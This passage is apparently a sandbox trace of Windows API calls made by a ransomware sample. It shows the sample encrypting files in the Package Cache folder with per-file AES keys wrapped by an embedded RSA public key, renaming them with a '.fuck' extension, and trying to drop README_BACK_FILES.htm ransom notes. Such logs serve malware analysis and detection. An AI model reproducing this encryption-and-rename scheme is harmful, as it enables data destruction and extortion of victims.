Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.fuck" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.fuck")) returned 0 [0240.699] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.699] CryptDestroyKey (hKey=0x28e7238) returned 1 [0240.699] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.699] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.699] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.699] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.699] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\readme_back_files.htm")) returned 0xffffffff [0240.700] AreFileApisANSI () returned 1 [0240.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2856f90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0240.700] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.700] GetLastError () returned 0x5 [0240.700] GetLastError () returned 0x5 [0240.700] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.700] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.701] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.701] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.701] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.702] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.702] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.702] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.702] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.703] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.703] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.703] GetLastError () returned 0x5 [0240.703] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0240.703] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.703] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.704] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.705] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.705] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f15b8) returned 1 [0240.708] CryptCreateHash (in: hProv=0x28f15b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.708] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.708] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.708] CryptDeriveKey (in: hProv=0x28f15b8, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7878) returned 1 [0240.708] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.708] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.708] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f1a80) returned 1 [0240.709] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1a80, dwCertEncodingType=0x1, pInfo=0x2904f38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2904f68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2904f70*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e79b8) returned 1 [0240.709] CryptEncrypt (in: hKey=0x28e79b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.709] CryptEncrypt (in: hKey=0x28e79b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1970*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f1970*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.709] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1970, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.710] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.710] CryptEncrypt (in: hKey=0x28e7878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.710] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.710] CloseHandle (hObject=0xffffffff) returned 1 [0240.710] CloseHandle (hObject=0xffffffff) returned 1 [0240.710] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0240.710] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.711] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg")) returned 0 [0240.711] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.fuck")) returned 0 [0240.712] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.712] CryptDestroyKey (hKey=0x28e7878) returned 1 [0240.712] CryptReleaseContext (hProv=0x28f15b8, dwFlags=0x0) returned 1 [0240.712] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.712] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.712] GetLastError () returned 0x5 [0240.712] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0240.712] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0240.713] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.713] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.714] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.714] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f18e8) returned 1 [0240.716] CryptCreateHash (in: hProv=0x28f18e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.716] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.716] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.716] CryptDeriveKey (in: hProv=0x28f18e8, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7938) returned 1 [0240.717] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.717] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.717] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f0dc0) returned 1 [0240.717] CryptImportPublicKeyInfo (in: hCryptProv=0x28f0dc0, dwCertEncodingType=0x1, pInfo=0x2905b68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905b98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905ba0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e76f8) returned 1 [0240.717] CryptEncrypt (in: hKey=0x28e76f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.717] CryptEncrypt (in: hKey=0x28e76f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1178*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f1178*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.718] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1178, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.718] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.718] CryptEncrypt (in: hKey=0x28e7938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.718] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.718] CloseHandle (hObject=0xffffffff) returned 1 [0240.718] CloseHandle (hObject=0xffffffff) returned 1 [0240.718] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), bFailIfExists=0) returned 0 [0240.718] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x0) returned 0 [0240.719] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg")) returned 0 [0240.719] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.fuck")) returned 0 [0240.720] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.720] CryptDestroyKey (hKey=0x28e7938) returned 1 [0240.720] CryptReleaseContext (hProv=0x28f18e8, dwFlags=0x0) returned 1 [0240.720] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.720] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.720] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm")) returned 0xffffffff [0240.720] AreFileApisANSI () returned 1 [0240.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28dbcb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0240.720] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.721] GetLastError () returned 0x5 [0240.721] GetLastError () returned 0x5 [0240.721] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.721] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.721] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.721] AreFileApisANSI () returned 1 [0240.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.721] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.722] GetLastError () returned 0x5 [0240.722] GetLastError () returned 0x5 [0240.722] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.722] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.722] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\readme_back_files.htm")) returned 0xffffffff [0240.722] AreFileApisANSI () returned 1 [0240.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0240.722] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.723] GetLastError () returned 0x5 [0240.723] GetLastError () returned 0x5 [0240.723] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.723] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.723] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.723] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.723] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.724] GetLastError () returned 0x5 [0240.724] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm")) returned 0x20 [0240.724] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", dwFileAttributes=0x80) returned 0 [0240.724] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.725] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.726] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0240.726] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, 